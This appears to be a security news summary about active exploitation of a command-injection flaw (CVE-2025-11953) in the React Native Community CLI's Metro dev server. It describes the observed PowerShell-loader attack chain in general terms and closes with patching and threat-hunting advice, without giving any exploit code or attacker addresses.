Critical React Native Metro dev server bug under attack as researchers scream into the void
Summary
Security researchers have observed active exploitation of a critical command-injection flaw in the Metro development server used by the React Native Community CLI (CVE-2025-11953). The vulnerability allows unauthenticated attackers to send requests that execute arbitrary code on affected Windows and Linux systems. Proof-of-concept exploits were published quickly after disclosure, and real-world attacks delivering multi-stage payloads have been seen in the wild.
Key Points
- The flaw is in the React Native Community CLI’s Metro dev server endpoint and is tracked as CVE-2025-11953.
- The package is widely used (around 2.5 million weekly downloads), increasing exposure among developers and build environments.
- Unauthenticated network attackers can run malicious executables or arbitrary shell commands via a POST request.
- JFrog and VulnCheck observed exploitation starting in December; proof-of-concept code appeared the day the bug was disclosed.
- Observed attacks used a PowerShell-based loader that disabled Microsoft Defender before fetching a Rust binary with anti-analysis tricks.
- Researchers warn that EPSS currently underrates the exploitation probability despite clear, internet-exposed targets.
- Specific attacker infrastructure (IP addresses and payload hosts) has been identified by researchers.
Content summary
JFrog researchers discovered the Metro dev server bug and disclosed it after Meta issued a fix. The weakness exposes an endpoint that can be abused for OS command injection, giving attackers a remote lane into developer machines and CI hosts. Attackers delivered a multi-stage payload—initial loader executed via cmd.exe/PowerShell which disables Defender and then retrieves a Rust binary designed to evade analysis. Exploitation was seen in December and continued into January.
Context and relevance
Developer tooling is an attractive target: widely installed, inconsistently monitored, and often treated as non-production software on laptops and CI systems. A critical vulnerability in a ubiquitous package like the React Native CLI can enable supply-chain style compromises, lateral movement in developer networks, and direct infection of build artefacts or app packages.
Why should I read this
If you work with React Native or run developer machines and CI systems, this matters — big time. It’s an easy-to-exploit, high-severity hole in tooling that sits on dev endpoints. Patch the CLI, check internet-exposed ports for Metro servers, hunt for the described PowerShell loader or unexpected Rust binaries, and review logs for connections to the listed IPs/hosts. We did the digging so you can act fast.